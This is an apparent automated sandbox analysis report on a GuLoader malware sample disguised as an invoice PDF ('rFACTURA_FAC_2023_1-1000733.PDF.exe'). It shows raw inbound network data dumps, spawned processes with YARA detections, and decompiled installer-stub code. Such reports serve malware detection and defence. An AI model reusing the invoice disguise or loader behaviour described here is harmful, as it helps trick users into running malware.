":]MhZl@7i)Mc@MW(xQT2M+>jA
2023-03-20 10:06:11 UTC	117	IN	Data Raw: 9a 6f 94 46 da e5 df 42 41 dc a4 f9 e1 f3 6e d7 22 67 c4 44 7b e7 54 f2 0a a6 b1 a9 81 7c 77 31 43 a6 3f 5c a0 29 ba 7a 20 f4 84 cf 47 26 d5 b1 e9 f4 bc 4d 56 2c 88 cb d0 f6 9b 7b 07 a6 84 27 0c 86 e8 2f 1c a9 42 ed 05 32 cf 3d c5 a4 35 63 29 1b 7e c6 52 f0 bd 93 eb 17 aa d7 55 9d 04 74 8e e0 18 0c 32 d1 68 cc 38 65 0f 42 c6 bf 39 92 8b 8d c0 4c 49 21 a8 42 b5 dc ef fe 61 39 24 82 e0 0b a4 50 bd 71 06 6a c9 a5 a1 e9 4a 16 6b ba 29 8f e7 be 38 36 44 3d 96 48 27 52 05 58 b7 ce c5 d6 94 84 5f 46 36 d7 e6 f2 1e 21 a5 ab 73 63 ab 1a 97 45 e0 20 47 8e 8b 85 38 54 ee a1 61 af 7d 47 2c b1 9b a7 bb c2 f3 ae 07 36 39 5b fb a3 2f e5 f1 b6 06 e9 c3 eb 34 49 19 f0 20 0a 7a bf 90 24 47 db 73 cd e6 44 fa 3a 0a 21 60 34 1c fa 81 2e 3c 21 7a ca d4 af 51 2f c1 ae 4a 18 d9 Data Ascii: oFBAn"gD{T\|w1C?\)z G&MV,{'/B2=5c)~RUt2h8eB9LI!Ba9$PqjJk)86D=H'RX_F6!scE G8Ta}G,69[/4I z$GsD:!`4.<!zQ/J
2023-03-20 10:06:11 UTC	118	IN	Data Raw: b2 30 3a 49 e8 fb 86 eb 30 58 52 49 a5 05 39 49 34 c4 cf e6 7b e8 d6 d1 13 60 04 32 03 6a 4d 37 4e 7e 16 30 db c4 ad c3 48 4a 23 fa c5 e8 5e 36 3a 57 c0 f9 f9 7e f2 45 42 1e 09 c0 48 be a7 de ab ab 54 e9 c2 2f e2 03 4a 00 6d 98 b2 ef cf b0 65 e6 cb c0 4a 11 6c c8 d1 74 53 d2 37 ff b9 59 86 12 41 de 5e aa a0 39 f7 0d 85 a7 ae 2e d7 19 40 c6 ac 4c c0 04 85 52 bc 25 8c 50 81 06 6d 0f 69 8d 5d 7e ef aa c2 9c 48 3a df 54 1b 29 70 53 df b3 d0 55 19 76 10 da cb 5f be 4d 14 83 4a c2 7b 3f fa fd 93 ef 52 f3 b6 a3 87 f9 5c 03 d9 03 a6 e0 27 b4 e9 e0 75 c7 3e e0 9c b8 e3 f1 24 fc 2b 51 09 8c 3e 3d 18 37 26 94 c2 9f f5 85 f7 f2 2e 02 c8 03 ca 96 7d 1e 1e ca 4d 2a de 83 82 c5 ec d2 01 8e e6 2f 0b 01 45 64 5b 18 70 86 e5 13 55 4f f4 83 3e 8b da 60 55 10 3e c7 04 82 38 Data Ascii: 0:I0XRI9I4{`2jM7N~0HJ#^6:W~EBHT/JmeJltS7YA^9.@LR%Pmi]~H:T)pSUv_MJ{?R\'u>$+Q>=7&.}M*/Ed[pUO>`U>8
2023-03-20 10:06:11 UTC	120	IN	Data Raw: ec 3e 46 f3 ea 38 7c 94 1a 60 20 c9 5e 7a 27 fc b8 2e dd e0 d0 5c ee d6 a2 49 c2 ab cb 5b 15 6e dd 76 9f b7 50 25 79 25 26 21 ca c9 c3 05 a0 ae 78 2b b3 f0 ea dd a1 d8 72 7c c5 59 12 ef 18 e1 58 80 ca 63 4c fe b2 90 f3 fe 7e 2c 2e 97 75 60 4c 0d 10 47 78 60 83 2f 95 77 5f bf 86 26 fe 11 dc 45 bd f8 df c6 98 ea 4b 34 18 93 1c 5e ad f5 c9 86 2b f1 cd 1c 27 cf 44 49 7c 99 be 5c f6 ec 23 3f fb a2 67 2c df 4b 87 a2 14 2c 83 39 5d e7 51 cb 2f 55 56 2c 93 84 86 d8 48 05 a5 3d 03 99 b9 33 e6 53 21 f3 61 bf 02 d8 40 bc ab 57 11 af 16 d3 fc 60 0e 9a 16 94 19 da a4 df 72 41 d9 a4 fd e1 ea 6e 92 22 6a c4 3d 7b b8 54 be 0a e8 b1 ef 81 34 77 6e 43 8b 3f 7b a0 42 ba 38 20 ac 84 8c 47 6f d5 bc e9 9f bc 32 56 49 88 a7 e9 8a 9b 34 07 98 84 26 0c 8f e8 6a 1c 9b 42 fe 05 50 Data Ascii: >F8\|` ^z'.\I[nvP%y%&!x+r\|YXcL~,.u`LGx`/w_&EK4^+'DI\|\#?g,K,9]Q/UV,H=3S!a@W`rAn"j={T4wnC?{B8 Go2VI4&jBP
2023-03-20 10:06:11 UTC	121	IN	Data Raw: d9 37 f5 68 89 00 35 dd ef eb 64 35 be ca 13 ca 12 67 4a e5 f2 d5 d7 a3 96 cd 74 5d 65 3e fb 51 aa c8 f1 91 06 e9 c3 eb 34 49 19 f0 20 0a 7a bf 90 24 47 fb 73 e7 e6 51 fa 3b 0a 35 60 31 1c fb 81 2e 3c 33 7a ca d4 a1 51 21 c1 ff 4a 5d d9 f5 8d 41 93 bb c4 aa 94 ac 27 51 f8 85 4a 9f f1 63 2b 1f 30 74 eb 9d b5 cd 4b d3 9c ee c8 25 3f 9d 81 38 f5 19 7a 14 16 aa a4 59 f0 b0 f1 54 cb ec 7c 75 a8 72 1c 4b 41 89 bd 02 c1 92 88 fb e0 80 12 9d 20 a1 be 1d 89 6c 42 8f de 5d db cc d6 f8 f4 5b ab 5a ba 60 0f 12 98 93 da 9f 87 89 13 78 ba 6d d9 00 81 ee 6b 69 32 8d a6 e7 96 7d 04 3d 35 cb 22 52 72 51 fe b6 ca 27 d4 86 ef 61 4f 6b 0d 65 41 24 0a 22 7f 4a 6c a8 82 ad 2a c9 2b 23 95 c5 9f 5e 72 3a 16 c0 b8 f9 32 f2 34 42 41 09 88 48 fd a7 e8 ab ab 54 fc c2 37 e2 03 4a 52 Data Ascii: 7h5d5gJt]e>Q4I z$GsQ;5`1.<3zQ!J]A'QJc+0tK%?8zYT\|urKA lB][Z`xmki2}=5"RrQ'aOkeA$"Jl*+#^r:24BAHT7JR
2023-03-20 10:06:11 UTC	122	IN	Data Raw: a6 a3 27 fa e9 a5 75 83 3e a1 9c f1 e3 dc 24 a6 2b 65 09 8c 3e 2c 18 2c 26 93 c2 cb f5 aa f7 ef 2e 03 c8 1d ca f0 7d 6e 1e ed 4d 2f de 8a 82 80 ec c5 01 88 e6 2c 0b 03 45 59 5b 45 70 fe e5 7d 58 61 f4 85 3e 94 da 71 55 59 3e e7 7b 8f 21 ed 73 cf 59 2e 04 bd e3 03 8f 9e fe 54 a6 14 1d ac 6f 09 9f df 7f d7 13 9a e4 92 6d 2d 14 e3 46 8c b6 55 1f c2 42 41 82 d3 30 5d c8 7d 60 e9 c7 07 b0 51 f4 95 44 9e 91 42 d4 ed 29 da 1c 5f 3a 0f 59 cc a0 0c b9 a0 7e 6d 6c 4e 5e 6b ba 8e 84 01 cc bf cb 2d 2f 0c dc 9c 23 ea 19 5d 49 4e 3a a8 48 1c f3 6d 0f c1 3e 6a f3 c0 38 37 94 57 60 20 c9 7b 7a 1f fc 81 2e b7 e0 a1 5c bd cf b8 49 c7 ab cf 5b 12 6e d7 76 c5 b7 16 25 39 25 74 21 92 c9 8c 05 f7 ae 78 31 ce f0 b9 9e af d8 59 7c fb 59 73 ef 00 e1 6d 80 e6 63 72 fe d7 90 f0 fe Data Ascii: 'u>$+e>,,&.}nM/,EY[Ep}Xa>qUY>{!sY.Tom-FUBA0]}`QDB)_:Y~mlN^k-/#]IN:Hm>j87W` {z.\I[nv%9%t!x1Y\|Ysmcr
2023-03-20 10:06:11 UTC	123	IN	Data Raw: 3b d3 d5 64 23 9a 3b 97 32 c7 81 dd 27 49 bf a4 98 e8 91 76 f9 2c 43 c1 69 79 c3 4c d6 01 8b b7 8d 99 5f 6a 19 4b bb 37 5f a9 6f bf 1c 38 8f 99 a4 4f 4a db 91 e0 bb a4 27 58 53 90 be d8 d1 9e 53 0e e9 84 49 05 f3 fb 4a 16 d4 5a 91 00 37 df 26 95 f1 30 04 34 6d 76 a2 5a c3 ae b3 e1 1f f7 96 50 cd 14 15 de 92 1d 69 2f 88 60 89 30 1e 0a 07 c4 cc 37 ba 89 cf ca 24 69 56 a9 3e b0 9d ea a7 64 58 04 e5 e1 64 aa 05 b8 00 03 03 cc e4 a4 b8 4f 64 6e c0 2c e2 c7 d1 30 0e 42 59 95 31 29 28 0b 31 97 cd aa c3 89 8b 4f 73 30 da e4 c2 1b 14 ab 81 53 4f b6 32 8a 75 e5 08 47 dd 9e f9 65 34 fc ae 64 ca 7c 69 31 e0 9e d5 b9 ad fb c3 03 5d 38 3c f5 d4 2f c4 ec 9e 08 c3 c3 c4 3a 79 1c c0 25 35 7a 95 92 19 56 a6 7d d7 f7 72 e2 45 1b 38 68 4a 0d ee 86 0e 3e 7b 67 bd c9 c5 5b 52 Data Ascii: ;d#;2'Iv,CiyL_jK7_o8OJ'XSSIJZ7&04mvZPi/`07$iV>dXdOdn,0BY1)(1Os0SO2uGe4d\|i1]8</:y%5zV}rE8hJ>{g[R
2023-03-20 10:06:11 UTC	124	IN	Data Raw: e3 00 d9 2a cc db 08 48 5d 9b c9 e0 e2 1e 52 3b 46 d0 43 55 21 40 8b ab a3 14 fa 93 8b 7a 3b 6b 7f 70 6f 1e 6f 3a 0b 46 02 bc f1 e9 cf 3b 4f 44 f1 a0 c0 70 0c 5f 4f b4 fc 97 78 81 4a 2b 02 6e c9 2d 9b ce d7 ce 82 31 f3 a7 2e 83 12 25 00 65 df 85 a4 ff ec 56 bb fb ee 4a 79 6d a5 da 55 2a fc 6d d2 cd 42 ef 0f 26 d9 5e aa af 49 f6 6d 94 54 7f 55 d6 19 49 96 ac 23 c0 76 89 27 bc 22 b2 0d d1 60 02 45 3a a0 5d 41 ee 87 cf e2 2b 65 b3 16 7c 70 19 1e ba 92 a2 49 19 17 01 b0 cb 36 fd 01 64 a5 2f c0 0f 37 97 fb e1 f6 52 96 ba d0 87 de 3f 42 a9 5c e3 9d 54 99 e9 c6 74 ea 38 a6 d0 d9 b7 b5 49 f6 2b 1a 08 e3 36 1c 48 0a 75 95 ac db 86 c3 f7 99 2f 6d dc 3b a4 fc 0f 51 6a e9 2e 37 b7 80 ec f4 bc db 52 82 88 27 78 6d 45 15 5a 15 7b dc 97 7d 10 61 81 98 57 95 bf 66 55 2a Data Ascii: H]R;FCU!@z;kpoo:F;ODp_OxJ+n-1.%eVJymUmB&^ImTUI#v'"`E:]A+e\|pI6d/7R?B\Tt8I+6Hu/m;Qj.7R'xmEZ{}aWfU*
2023-03-20 10:06:11 UTC	126	IN	Data Raw: 4d 59 f3 32 8e 57 1b 02 e2 ac 3a 28 15 a0 7d 6d db 95 1f 7e 7d e4 2c 9f 62 80 41 b9 c4 77 cc 86 29 99 59 5f ef 95 74 a3 b9 71 a4 5c 35 10 26 e1 d5 e9 1c 97 b3 64 35 90 ed f9 87 fd da 19 5c aa 58 2f ea 45 e9 2d a0 ae 62 2c 7c 9f 95 83 fe 1e ae 50 92 33 60 37 8f 69 4f 3d 63 a2 3d 3e 12 71 b1 b4 33 cc 93 e9 44 90 7a fa c3 d9 eb 2c 27 6c 97 79 5f d7 fb f1 a6 04 f0 f5 9e 2f c9 64 43 1c 8b 5a 5d 9c eb 4a 31 87 ac 65 22 26 6e a5 20 40 3e 7a 14 7d 65 1d da d6 70 76 ae c7 96 7f f5 69 84 c9 38 58 99 9f b1 ae 56 01 b4 7e 3d 31 df 6d b8 88 59 32 a1 35 d6 f1 60 31 18 7a 91 14 da 95 5d 10 44 97 a6 9d e9 89 66 f7 23 58 46 44 69 48 11 d3 2a 88 b0 95 03 18 66 9e 0a ba bd 73 a6 6f bb 07 a2 cc 8a 82 40 4d d7 83 68 4f a1 3a 44 c2 ed b4 51 dd 99 49 85 ec 96 ca 15 f9 6a 4f 1e Data Ascii: MY2W:(}m~},bAw)Y_tq\5&d5\X/E-b,\|P3`7iO=c=>q3Dz,'ly_/dCZ]J1e"&n @>z}epvi8XV~=1mY25`1z]Df#XFDiH*fso@MhO:DQIjO
2023-03-20 10:06:11 UTC	127	IN	Data Raw: 11 ab 9b 61 57 b6 35 95 6c e0 01 4f c1 8d eb 3a 29 f2 d8 78 da 7d 6f 2d f9 89 cc b5 be ef d0 09 40 2b 27 f9 d3 25 c2 f9 95 08 ca cd ce 3a 66 1b d9 00 26 79 9a 8c 0e 4b ca 61 46 53 1f ff 48 0f 49 65 48 9e 43 9c 0b 21 62 68 39 6d dd 54 4c d3 15 5b 32 d9 84 8c 73 12 2b d6 06 29 89 21 5c f9 a9 5b 30 10 77 2c 28 3e 77 f9 15 5c 99 c9 51 8e 19 25 59 bd 14 93 9a 18 51 74 68 18 cb b9 31 e2 08 40 66 49 49 7e 0f 2a b6 0e a7 b0 ef af e5 70 f2 0a 68 e2 fb 90 5e 32 47 4f 12 9b e7 53 c1 fe 33 c9 3d 3b 82 ed 66 a6 68 38 88 34 5d 8a 7e 37 f7 05 0d 01 96 57 09 d1 69 89 ba 77 28 b3 f9 a0 a6 97 22 86 a7 3d ff 25 03 7c 28 fc c7 c2 73 dc de f3 01 56 0a 10 1f 5c 51 17 40 62 3d 75 c6 80 b1 a4 54 34 3a 91 d8 ae 43 43 27 35 dd 87 e0 03 fc 05 50 75 07 b8 54 c0 bb b3 b7 d9 46 84 cc Data Ascii: aW5lO:)x}o-@+'%:f&yKaFSHIeHC!bh9mTL[2s+)!\[0w,(>w\Q%YQth1@fII~*ph^2GOS3=;fh84]~7Wiw("=%\|(sV\Q@b=uT4:CC'5PuTF
2023-03-20 10:06:11 UTC	128	IN	Data Raw: d9 5c 2e d9 2e a6 cd 27 9b e9 dd 75 ea 3e ed 9c 95 63 e4 24 f6 2b 47 09 e3 be 48 18 59 26 f0 c2 bf f5 c3 f7 80 2e 6d c8 6f ca ad 7d 3e 1e b4 4d 43 5e ef 82 a0 ec 88 01 e7 e6 43 0b 6d 45 05 5b 14 70 8c e5 12 58 87 f4 ec 3e f8 da 14 55 2a 3e e7 04 82 21 e7 73 e2 59 02 04 91 e3 2e 8f db fe 79 26 39 1d 81 6f 29 9f 8c 7f b9 13 fb e4 f9 6d 49 14 c3 46 d8 b6 b7 1f a3 42 82 a2 ba 30 94 cb 0f 60 c9 c7 2a b0 7c f4 b8 44 ff b5 6d d4 9b 25 f7 1c 72 3a 02 59 c6 a0 4a b9 63 7d 2c 6c 20 5e 59 ba fd 84 18 cc 9b cb 07 2f 33 dc f5 23 83 19 42 49 61 3a 9b 48 30 f3 6e 0f e8 3e 4a f3 ae 38 3a 94 e0 64 87 37 14 7a 6d fc f5 2e 8c e0 81 5c bc d6 f6 49 95 ab 9c 5b 4d 6e bb 76 ad b7 63 25 4d 25 14 21 fd c9 fa 05 99 ae 78 28 9e f0 eb 9e e0 d8 1e 7c a9 59 76 ef 4d e1 2a 80 f9 63 5f Data Ascii: \..'u>c$+GHY&.mo}>MC^CmE[pX>U>!sY.y&9o)mIFB0`\|Dm%r:YJc},l ^Y/3#BIa:H0n>J8:d7zm.\I[Mnvc%M%!x(\|YvM*c_
2023-03-20 10:06:11 UTC	129	IN	Data Raw: d1 e3 6a 1e e2 42 92 a1 10 4f f3 58 f5 40 b3 eb b1 0f 20 c7 d4 be ce bf 63 fd 02 6a f8 1d 09 bf 27 ab 43 e5 d7 eb a1 29 1a 70 2d d8 02 74 d5 1d d4 2f 53 e2 ec c4 2a 23 a6 bc 84 db df 4d 39 30 e7 c0 a4 e1 f8 34 6a d7 e5 3b 61 c5 9e 78 3e e3 4f 86 25 1f ef 17 f9 9f 50 6f 5c 1a 17 c6 2b f4 b0 b9 cb 36 cf ab 75 e5 38 76 eb fe Data Ascii: jBOX@ cj'C)p-t/S*#M904j;ax>O%Po\+6u8v
2023-03-20 10:06:11 UTC	129	IN	Data Raw: 6d 04 41 f9 0d fd 68 64 66 51 af a1 5c d5 ee ba e0 55 24 39 c6 50 88 a2 9a c8 0f 66 57 87 88 0f c9 44 ce 30 6b 77 aa 8b ce d6 25 1f 1f f0 4a 89 8a ea 59 65 29 57 e0 1a 05 18 08 33 97 ee 92 fb b4 ae 7f 4b 0a db cb f2 3e 59 e4 c5 53 03 ca 59 fe 0e 85 73 33 fd c4 9b 4c 5c 81 a4 12 c7 77 47 0c c5 bb f5 9b 83 d3 ed 27 7d 19 1e b2 b7 0f bc 9e ee 26 b3 a2 a8 40 44 6d b2 00 44 12 f3 fe 6e 22 f6 07 af 83 22 ad 3c 64 30 0f 2d 6f be d4 7d 59 15 5a f9 b7 a3 3e 37 af e0 6a 7b b6 e9 f9 13 fc fa e4 eb f1 f7 42 10 d8 da 2f c2 9d 2f 48 57 10 0d 83 f2 95 86 41 9c bc bb e8 6b 1f d9 a1 38 d5 7f 5a 46 64 a0 d5 41 95 f9 85 11 af fd 04 78 cb 72 68 4c 2e 83 f1 02 b7 85 e4 b9 8e 86 76 8a 00 b2 d7 64 e1 46 2d a9 bb 12 b4 d9 f6 f8 9c 04 8b 1c d5 0d 56 30 ef 95 b4 82 a9 ed 19 19 b0 Data Ascii: mAhdfQ\U$9PfWD0kw%JYe)W3K>YSYs3L\wG'}&@DmDn""<d0-o}YZ>7j{B//HWAk8ZFdAxrhL.vdF-V0
2023-03-20 10:06:11 UTC	131	IN	Data Raw: 61 96 7f 87 84 55 84 19 f5 a4 c1 2f a3 7c 2d d9 ff 03 89 12 b8 04 c7 40 cb 6d b0 3d 59 17 5e 8d 6c 66 db b1 ef 85 7b 74 ea 54 7a 31 16 16 f2 d0 e0 03 7d 72 75 d4 f8 5e 8d 0b 24 aa 68 90 54 60 d7 b3 ad 89 58 9b bc f1 a7 f9 7c 0e f9 12 87 e0 0a b9 be a4 1b 8e 51 ba ef b5 d4 dc 09 db 15 1a 03 c3 1e 68 38 79 06 cc e3 92 d8 ff 84 f5 5e 1d a7 1c be c9 19 71 4d ac 04 27 e3 cd f9 93 d9 b9 32 df 84 7a 6a 40 70 61 62 23 5d b8 83 70 3c 2a cc 89 0c 9c f7 75 67 1e 0a d7 36 b0 14 81 4a d1 38 7e 26 b0 cc 10 a2 9e c0 74 ac 34 17 a1 4f 09 bf ac 5f 85 32 d6 c9 d9 3a 21 7a a7 29 af c5 07 27 83 6f 0f bc b5 3a 18 e8 2f 40 e9 e7 16 91 51 d9 84 37 c6 e1 1f bb b2 5d 92 78 3d 69 22 10 a2 9d 68 c2 fb 1f 2a 0a 12 66 6a 89 83 b1 74 ae f4 e6 76 1b 55 ed 8b 41 ab 20 6e 64 4b 0c fd 2c Data Ascii: aU/\|-@m=Y^lf{tTz1}ru^$hT`X\|Qh8y^qM'2zj@pab#]p<ug6J8~&t4O_2:!z)'o:/@Q7]x=i"hfjtvUA ndK,
2023-03-20 10:06:11 UTC	132	IN	Data Raw: e5 8b c3 ee ae 83 43 50 03 e4 0a 7e 87 a5 d7 e7 6b 95 c7 70 6f bb 21 30 34 b9 f5 71 bc e1 4c 1f a9 9e 46 1e 89 46 bd 82 49 10 9c 5c 1c 82 42 af 31 3b 07 55 d0 89 f7 f8 5b 25 f8 01 1c fc fd 56 f5 37 44 da 18 fe 7b ab 08 d1 e4 3b 45 91 36 d9 f1 40 03 ba 1b b4 08 bb f7 ac 44 2c d5 c8 e5 a8 e5 0b 99 56 23 b0 10 76 c0 74 ff 2a ab 91 a4 a1 71 57 3c 37 d2 4f 33 9d 4d cd 7c 4e b2 b6 83 4a 48 f5 b1 c9 92 9c 1f 76 63 a8 86 be ad f6 3e 3a cf c9 21 6f 99 87 39 73 bb 36 a2 52 56 a1 53 aa 9b 46 22 6a 07 13 df 3d a4 90 f0 84 78 9b f9 3a a9 77 26 83 85 38 41 12 ad 48 b9 18 36 2f 07 b0 a8 4b c1 e2 a6 ae 10 6b 63 86 13 9b b0 c1 8a 43 51 2e c4 c0 4a 84 05 9d 3d 26 3e e9 89 d3 ca 29 1c 18 ae 46 94 a6 a2 5b 7e 2d 0d f3 4a 53 53 77 5c 8a ec 98 f9 99 84 7f 4b 16 da c6 ff 3e 2c Data Ascii: CP~kpo!04qLFFI\B1;U[%V7D{;E6@D,V#vt*qW<7O3M\|NJHvc>:!o9s6RVSF"j=x:w&8AH6/KkcCQ.J=&>)F[~-JSSw\K>,

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: rFACTURA_FAC_2023_1-1000733.PDF.exePID: 8312, Parent PID: 4788

General

Target ID:	0
Start time:	11:05:09
Start date:	20/03/2023
Path:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
Imagebase:	0x400000
File size:	431872 bytes
MD5 hash:	A6EF5ED777BA7369C2BB28E46B198BA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.1415606595.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1415606595.0000000005E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 6576, Parent PID: 8312

General

Target ID:	11
Start time:	11:06:03
Start date:	20/03/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
Imagebase:	0xbe0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.1786467995.0000000000FC0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3964, Parent PID: 6576

General

Target ID:	12
Start time:	11:06:03
Start date:	20/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff64d8d0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 8568, Parent PID: 6576

General

Target ID:	15
Start time:	11:06:18
Start date:	20/03/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 2500
Imagebase:	0xab0000
File size:	482640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: rFACTURA_FAC_2023_1-1000733.PDF.exePID: 8312, Parent PID: 4788COMMON

Execution Graph

Execution Coverage:	20.2%
Dynamic/Decrypted Code Coverage:	13.5%
Signature Coverage:	19.6%
Total number of Nodes:	1554
Total number of Limit Nodes:	40

Executed Functions

Function 00403350 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 412
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t63;
				void* _t66;
				void* _t68;
				int _t70;
				int _t72;
				int _t75;
				intOrPtr* _t76;
				int _t77;
				int _t79;
				void* _t103;
				signed int _t120;
				void* _t123;
				void* _t128;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr* _t149;
				int _t151;
				void* _t154;
				int _t155;
				signed int _t159;
				signed int _t164;
				signed int _t169;
				void* _t171;
				WCHAR* _t172;
				signed int _t175;
				signed int _t178;
				CHAR* _t179;
				void* _t182;
				int* _t184;
				void* _t192;
				char* _t193;
				void* _t196;
				void* _t197;
				void* _t243;

				_t171 = 0x20;
				_t151 = 0;
				 *(_t197 + 0x14) = 0;
				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t197 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x7a8a2c = _t51;
				if(_t51 != 6) {
					_t149 = E00406639(0);
					if(_t149 != 0) {
						 *_t149(0xc00);
					}
				}
				_t179 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t192);
				__imp__OleInitialize(_t151); // executed
				 *0x7a8af8 = _t56;
				SHGetFileInfoW(0x79fee0, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
				E0040625F("Tophyperidrosis Setup", L"NSIS Error");
				_t60 = GetCommandLineW();
				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\rFACTURA_FAC_2023_1-1000733.PDF.exe\"";
				E0040625F(_t193, _t60);
				 *0x7a8a20 = GetModuleHandleW(_t151);
				_t63 = _t193;
				if(L"\"C:\\Users\\Arthur\\Desktop\\rFACTURA_FAC_2023_1-1000733.PDF.exe\"" == 0x22) {
					_t63 =  &M007B3002;
					_t171 = 0x22;
				}
				_t155 = CharNextW(E00405B5D(_t63, _t171));
				 *(_t197 + 0x18) = _t155;
				_t66 =  *_t155;
				if(_t66 == _t151) {
					L33:
					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t172);
					_t68 = E0040331F(_t155, 0);
					_t225 = _t68;
					if(_t68 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
						 *(_t197 + 0x10) = _t70;
						if(_t70 != _t151) {
							L48:
							E00403893();
							__imp__OleUninitialize();
							_t239 =  *(_t197 + 0x10) - _t151;
							if( *(_t197 + 0x10) == _t151) {
								__eflags =  *0x7a8ad4 - _t151;
								if( *0x7a8ad4 == _t151) {
									L72:
									_t72 =  *0x7a8aec;
									__eflags = _t72 - 0xffffffff;
									if(_t72 != 0xffffffff) {
										 *(_t197 + 0x10) = _t72;
									}
									ExitProcess( *(_t197 + 0x10));
								}
								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
								__eflags = _t75;
								if(_t75 != 0) {
									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
									 *(_t197 + 0x34) = 1;
									 *(_t197 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
								}
								_t76 = E00406639("true");
								__eflags = _t76 - _t151;
								if(_t76 == _t151) {
									L70:
									_t77 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
									__eflags = _t79;
									if(_t79 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E004058C1( *(_t197 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x7a8a40 == _t151) {
							L47:
							 *0x7a8aec =  *0x7a8aec | 0xffffffff;
							 *(_t197 + 0x14) = E0040396D( *0x7a8aec);
							goto L48;
						}
						_t184 = E00405B5D(_t193, _t151);
						if(_t184 < _t193) {
							L44:
							_t236 = _t184 - _t193;
							 *(_t197 + 0x10) = L"Error launching installer";
							if(_t184 < _t193) {
								_t182 = E0040582C(_t239);
								lstrcatW(_t172, L"~nsu");
								if(_t182 != _t151) {
									lstrcatW(_t172, "A");
								}
								lstrcatW(_t172, L".tmp");
								_t195 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t172);
									if(_t182 == _t151) {
										E0040580F();
									} else {
										E00405792();
									}
									SetCurrentDirectoryW(_t172);
									_t243 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated" - _t151; // 0x43
									if(_t243 == 0) {
										E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated", _t195);
									}
									E0040625F(0x7a9000,  *(_t197 + 0x18));
									_t156 = "A" & 0x0000ffff;
									 *0x7a9800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t196 = 0x1a;
									do {
										E00406281(_t151, _t172, 0x79f6e0, 0x79f6e0,  *((intOrPtr*)( *0x7a8a34 + 0x120)));
										DeleteFileW(0x79f6e0);
										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\rFACTURA_FAC_2023_1-1000733.PDF.exe", 0x79f6e0, ?str?) != 0) {
											E00406025(_t156, 0x79f6e0, _t151);
											E00406281(_t151, _t172, 0x79f6e0, 0x79f6e0,  *((intOrPtr*)( *0x7a8a34 + 0x124)));
											_t103 = E00405844(0x79f6e0);
											if(_t103 != _t151) {
												CloseHandle(_t103);
												 *(_t197 + 0x10) = _t151;
											}
										}
										 *0x7a9800 =  *0x7a9800 + 1;
										_t196 = _t196 - 1;
									} while (_t196 != 0);
									E00406025(_t156, _t172, _t151);
								}
								goto L48;
							}
							 *_t184 = _t151;
							_t185 =  &(_t184[2]);
